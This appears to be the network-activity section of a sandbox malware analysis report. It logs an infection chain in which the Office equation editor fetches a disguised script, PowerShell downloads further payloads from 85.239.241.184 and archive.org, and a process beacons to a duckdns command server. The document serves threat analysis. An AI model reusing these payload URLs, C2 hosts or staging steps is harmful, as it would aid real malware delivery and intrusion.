                          Sep 6, 2024 11:26:10.850100040 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850107908 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.850111961 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850125074 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850127935 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.850136995 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850157976 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.850302935 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850315094 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850326061 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.850338936 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.850359917 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.850634098 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893333912 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893336058 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893341064 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893347025 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893357038 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893361092 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893372059 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893485069 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893510103 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893522024 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893532991 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893544912 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893553972 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893556118 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893569946 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893578053 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893583059 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893603086 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893702984 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893745899 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893755913 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893769026 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893816948 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.893970013 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893982887 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.893992901 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894004107 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894016027 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894018888 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894035101 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894040108 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894047976 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894058943 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894072056 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894073009 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894085884 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894097090 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894097090 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894119978 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894695997 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894715071 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894726038 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894740105 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894753933 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894779921 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894798040 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894808054 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894819021 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896156073 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896156073 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896183968 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896204948 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896219969 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896220922 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896234035 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896251917 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896312952 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896333933 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896349907 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.898498058 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908164024 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908174992 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908183098 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908262968 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908273935 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908288956 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908299923 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908310890 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908323050 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908344984 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908550024 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908588886 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908626080 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908658028 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908713102 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908724070 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908749104 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908826113 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908837080 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908847094 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908868074 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908911943 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908924103 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908934116 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908947945 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908950090 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908960104 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908971071 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908971071 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908983946 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908993959 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.909020901 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.910804987 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920367002 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920406103 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920416117 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920455933 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920494080 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920505047 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920515060 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920526028 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920540094 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920546055 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920640945 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920681953 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938498020 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938565016 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938575983 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938616037 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938632011 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938642979 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938664913 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938678026 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938702106 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938754082 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938762903 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938775063 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938810110 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938815117 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938827038 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938837051 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938853979 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938858032 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938868046 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938879013 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938890934 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938910007 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938910007 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939388037 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939424992 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939443111 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939455032 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939481974 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939536095 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939548016 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939557076 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939568996 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939582109 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939596891 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939975977 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940059900 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940071106 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940082073 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940089941 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940092087 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940108061 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940115929 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940126896 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940138102 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940145969 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940149069 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940167904 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940589905 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940601110 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940609932 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940619946 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940627098 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940632105 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940642118 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940644026 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940655947 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940661907 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940690041 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.941293001 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.959472895 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:10.959522963 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:16.209307909 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.214411974 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.214498997 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.214895010 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.214953899 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.219348907 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.219417095 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.219578981 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.219635010 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.219860077 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.219907045 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.220103025 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.220160961 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.228398085 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.228462934 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.228511095 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.228523016 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.228532076 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229043007 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229079008 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229239941 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229275942 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229546070 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.239228010 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.239275932 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.239537954 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.240961075 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.241019964 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:19.053184032 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:19.091228962 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:19.097364902 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:49.277864933 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:49.279304981 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:49.284163952 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:27:19.406217098 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:27:19.409634113 CEST | 49164 | 2201 | 192.168.2.22 | 45.89.247.65
                          Sep 6, 2024 11:27:19.414628983 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:27:26.227190018 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:26.554229021 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:27.162621021 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:28.363831043 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:30.781841040 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:35.602333069 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:45.211885929 CEST | 49166 | 80 | 192.168.2.22 | 178.237.33.50
                          Sep 6, 2024 11:27:49.658801079 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:27:49.660257101 CEST | 49164 | 2201 | 192.168.2.22 | 45.89.247.65
                          Sep 6, 2024 11:27:49.665066004 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:28:19.744287014 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:28:19.745891094 CEST | 49164 | 2201 | 192.168.2.22 | 45.89.247.65
                          Sep 6, 2024 11:28:19.750874043 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:28:49.960258961 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:28:49.962450027 CEST | 49164 | 2201 | 192.168.2.22 | 45.89.247.65
                          Sep 6, 2024 11:28:49.967274904 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:29:20.219898939 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:29:20.221688986 CEST | 49164 | 2201 | 192.168.2.22 | 45.89.247.65
                          Sep 6, 2024 11:29:20.226563931 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:29:50.509773016 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Sep 6, 2024 11:29:50.511310101 CEST | 49164 | 2201 | 192.168.2.22 | 45.89.247.65
                          Sep 6, 2024 11:29:50.516192913 CEST | 2201 | 49164 | 45.89.247.65 | 192.168.2.22
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Sep 6, 2024 11:26:01.949716091 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                          Sep 6, 2024 11:26:01.956175089 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                          Sep 6, 2024 11:26:05.716976881 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                          Sep 6, 2024 11:26:06.728667974 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                          Sep 6, 2024 11:26:07.744129896 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                          Sep 6, 2024 11:26:07.825788021 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                          Sep 6, 2024 11:26:09.324975014 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                          Sep 6, 2024 11:26:09.333816051 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                          Sep 6, 2024 11:26:10.723718882 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                          Sep 6, 2024 11:26:10.841609955 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                          Timestamp | Source IP | Dest IP | Checksum | Code | Type
                          Sep 6, 2024 11:26:10.723783016 CEST | 192.168.2.22 | 8.8.8.8 | d009 | (Port unreachable) | Destination Unreachable
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Sep 6, 2024 11:26:01.949716091 CEST | 192.168.2.22 | 8.8.8.8 | 0x8492 | Standard query (0) | archive.org | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:05.716976881 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdc8 | Standard query (0) | dremom2.duckdns.org | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:06.728667974 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdc8 | Standard query (0) | dremom2.duckdns.org | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:07.744129896 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdc8 | Standard query (0) | dremom2.duckdns.org | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:09.324975014 CEST | 192.168.2.22 | 8.8.8.8 | 0x3f04 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Sep 6, 2024 11:26:01.956175089 CEST | 8.8.8.8 | 192.168.2.22 | 0x8492 | No error (0) | archive.org | | 207.241.224.2 | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:07.825788021 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdc8 | No error (0) | dremom2.duckdns.org | | 45.89.247.65 | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:09.333816051 CEST | 8.8.8.8 | 192.168.2.22 | 0x3f04 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:10.723718882 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdc8 | Server failure (2) | dremom2.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
                          Sep 6, 2024 11:26:10.841609955 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdc8 | No error (0) | dremom2.duckdns.org | | 45.89.247.65 | A (IP address) | IN (0x0001) | false
                          • archive.org
                          • 85.239.241.184
                          • geoplugin.net
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.22 | 49161 | 85.239.241.184 | 80 | 3616 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 6, 2024 11:25:58.202282906 CEST | 344 | OUT | GET /35/wescreenthepicturewithbuttersmoothpy.tIF HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 85.239.241.184
                          Connection: Keep-Alive
                          Sep 6, 2024 11:25:58.698981047 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Fri, 06 Sep 2024 09:25:58 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 06 Sep 2024 06:45:03 GMT
                          ETag: "2fc10-6216dbf388e55"
                          Accept-Ranges: bytes
                          Content-Length: 195600
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: image/tiff
                          Data Ascii: WUZWuQPWIBec = "mjlkZLOorlBz"kaqLLxWxLQLh = "bcPkOHWziLcW"cNGPkLmcQuJf = "cHhhWAGLAkmv"jkglTWeGiJKn = "eZOLmppTBLLL"KxWZBtHtohzd = "eivuLaUjzLxs"ikhCWKcRICWW = "fGWfqcziitGC"muehWPvuLTUa = "fLLWBkKWKqtx"KLkvWWWSlzvd = "obvaguearBLeafLLP"zkOLeaZobhRU = "ltPWLkmLAWmK"hPizApZdUodh = "WkUmjUovaguearhzS"skNlenKrenQx = "BeceziGxLAim"dNAqoZGLUPfz = "hWbZhppWlTuU"GabWdqNhhmuZ = "tQQKUxiWRIaL"mhtTUbomWKtc = "WLrzIuRcLcIl"gfGWLhGemkmK


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.22 | 49163 | 85.239.241.184 | 80 | 3900 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 6, 2024 11:26:04.468487024 CEST | 77 | OUT | GET /35/WERFFG.txt HTTP/1.1
                          Host: 85.239.241.184
                          Connection: Keep-Alive
                          Sep 6, 2024 11:26:04.968209982 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Fri, 06 Sep 2024 09:26:04 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 06 Sep 2024 06:34:48 GMT
                          ETag: "a1000-6216d9a8db95a"
                          Accept-Ranges: bytes
                          Content-Length: 659456
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/plain


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.22 | 49166 | 178.237.33.50 | 80 | 4008 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 6, 2024 11:26:09.341891050 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                          Host: geoplugin.net
                          Cache-Control: no-cache
                          Sep 6, 2024 11:26:09.960402012 CEST | 1170 | IN | HTTP/1.1 200 OK
                          date: Fri, 06 Sep 2024 09:26:09 GMT
                          server: Apache
                          content-length: 962
                          content-type: application/json; charset=utf-8
                          cache-control: public, max-age=300
                          access-control-allow-origin: *
                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.22 | 49162 | 207.241.224.2 | 443 | 3900 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-09-06 09:26:02 UTC | 101 | OUT | GET /download/new_image_vbs/new_image_vbs.jpg HTTP/1.1
                          Host: archive.org
                          Connection: Keep-Alive
                          2024-09-06 09:26:02 UTC | 780 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.24.0 (Ubuntu)
                          Date: Fri, 06 Sep 2024 09:26:02 GMT
                          Content-Type: image/jpeg; charset=UTF-8
                          Content-Length: 1933957
                          Connection: close
                          Last-Modified: Thu, 05 Sep 2024 13:20:17 GMT
                          ETag: "66d9b011-1d8285"
                          Strict-Transport-Security: max-age=15724800
